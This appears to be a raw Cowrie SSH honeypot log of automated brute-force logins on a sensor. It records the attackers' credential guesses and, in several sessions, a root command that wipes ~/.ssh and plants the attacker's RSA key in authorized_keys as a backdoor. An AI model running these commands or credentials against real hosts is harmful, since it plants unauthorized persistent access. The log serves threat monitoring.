"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:51:54.097751Z","src_ip":"212.227.235.229","session":"4e2ba6e87603"}
{"eventid":"cowrie.login.success","username":"root","password":"changeme!","message":"login attempt [root/changeme!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:51:54.473300Z","src_ip":"212.227.235.229","session":"4e2ba6e87603"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:51:54.691045Z","src_ip":"212.227.235.229","session":"4e2ba6e87603"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:51:54.691840Z","src_ip":"212.227.235.229","session":"4e2ba6e87603"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:51:54.692954Z","src_ip":"212.227.235.229","session":"4e2ba6e87603"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:51:54.784913Z","src_ip":"212.227.235.229","session":"4e2ba6e87603"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:51:54.970757Z","src_ip":"212.227.235.229","session":"4e2ba6e87603"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:51:54.971614Z","src_ip":"212.227.235.229","session":"4e2ba6e87603"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:51:55.057705Z","src_ip":"212.227.235.229","session":"4e2ba6e87603"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:51:55.059030Z","src_ip":"212.227.235.229","session":"4e2ba6e87603"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51710,"dst_ip":"1.2.3.4","dst_port":22,"session":"d98b1e8c5921","protocol":"ssh","message":"New connection: 212.227.235.229:51710 (1.2.3.4:22) [session: d98b1e8c5921]","sensor":"my-vps","timestamp":"2025-09-09T07:51:55.140654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:51:55.141821Z","src_ip":"212.227.235.229","session":"d98b1e8c5921"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:51:55.225638Z","src_ip":"212.227.235.229","session":"d98b1e8c5921"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:51:55.603208Z","src_ip":"212.227.235.229","session":"d98b1e8c5921"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:51:56.690083Z","src_ip":"212.227.235.229","session":"d98b1e8c5921"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51714,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0698158ecfa","protocol":"ssh","message":"New connection: 212.227.235.229:51714 (1.2.3.4:22) [session: b0698158ecfa]","sensor":"my-vps","timestamp":"2025-09-09T07:51:56.773090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:51:56.774031Z","src_ip":"212.227.235.229","session":"b0698158ecfa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:51:56.857672Z","src_ip":"212.227.235.229","session":"b0698158ecfa"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:51:57.234998Z","src_ip":"212.227.235.229","session":"b0698158ecfa"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:51:57.320397Z","src_ip":"212.227.235.229","session":"4e2ba6e87603"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:51:57.321322Z","src_ip":"212.227.235.229","session":"b0698158ecfa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35424,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d4d4f1f5ad5","protocol":"ssh","message":"New connection: 212.227.125.160:35424 (1.2.3.4:22) [session: 8d4d4f1f5ad5]","sensor":"my-vps","timestamp":"2025-09-09T07:52:11.078277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:52:11.594490Z","src_ip":"212.227.125.160","session":"8d4d4f1f5ad5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:52:11.849699Z","src_ip":"212.227.125.160","session":"8d4d4f1f5ad5"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-09-09T07:52:26.815200Z","src_ip":"212.227.125.160","session":"8d4d4f1f5ad5"}
{"eventid":"cowrie.session.closed","duration":"17.0","message":"Connection lost after 17.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:52:28.121960Z","src_ip":"212.227.125.160","session":"8d4d4f1f5ad5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56542,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bc0cabd16e0","protocol":"ssh","message":"New connection: 212.227.235.229:56542 (1.2.3.4:22) [session: 0bc0cabd16e0]","sensor":"my-vps","timestamp":"2025-09-09T07:53:01.743506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:53:01.744484Z","src_ip":"212.227.235.229","session":"0bc0cabd16e0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:53:01.830165Z","src_ip":"212.227.235.229","session":"0bc0cabd16e0"}
{"eventid":"cowrie.login.success","username":"root","password":"traffic","message":"login attempt [root/traffic] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:53:02.210442Z","src_ip":"212.227.235.229","session":"0bc0cabd16e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:53:02.454022Z","src_ip":"212.227.235.229","session":"0bc0cabd16e0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:53:02.454958Z","src_ip":"212.227.235.229","session":"0bc0cabd16e0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:53:02.456235Z","src_ip":"212.227.235.229","session":"0bc0cabd16e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:53:02.542035Z","src_ip":"212.227.235.229","session":"0bc0cabd16e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:53:02.773870Z","src_ip":"212.227.235.229","session":"0bc0cabd16e0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:53:02.774855Z","src_ip":"212.227.235.229","session":"0bc0cabd16e0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:53:02.862303Z","src_ip":"212.227.235.229","session":"0bc0cabd16e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:53:02.863238Z","src_ip":"212.227.235.229","session":"0bc0cabd16e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39812,"dst_ip":"1.2.3.4","dst_port":22,"session":"c23e11aa16c8","protocol":"ssh","message":"New connection: 212.227.235.229:39812 (1.2.3.4:22) [session: c23e11aa16c8]","sensor":"my-vps","timestamp":"2025-09-09T07:53:02.946757Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:53:02.947371Z","src_ip":"212.227.235.229","session":"c23e11aa16c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:53:03.032265Z","src_ip":"212.227.235.229","session":"c23e11aa16c8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:53:03.413452Z","src_ip":"212.227.235.229","session":"c23e11aa16c8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:53:04.500650Z","src_ip":"212.227.235.229","session":"c23e11aa16c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39820,"dst_ip":"1.2.3.4","dst_port":22,"session":"d66c84c2e23d","protocol":"ssh","message":"New connection: 212.227.235.229:39820 (1.2.3.4:22) [session: d66c84c2e23d]","sensor":"my-vps","timestamp":"2025-09-09T07:53:04.584824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:53:04.585614Z","src_ip":"212.227.235.229","session":"d66c84c2e23d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:53:04.670423Z","src_ip":"212.227.235.229","session":"d66c84c2e23d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:53:05.054391Z","src_ip":"212.227.235.229","session":"d66c84c2e23d"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:53:05.141310Z","src_ip":"212.227.235.229","session":"0bc0cabd16e0"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:53:05.142277Z","src_ip":"212.227.235.229","session":"d66c84c2e23d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51742,"dst_ip":"1.2.3.4","dst_port":22,"session":"adc9a2080149","protocol":"ssh","message":"New connection: 212.227.125.160:51742 (1.2.3.4:22) [session: adc9a2080149]","sensor":"my-vps","timestamp":"2025-09-09T07:53:13.170630Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:53:13.195412Z","src_ip":"212.227.125.160","session":"adc9a2080149"}
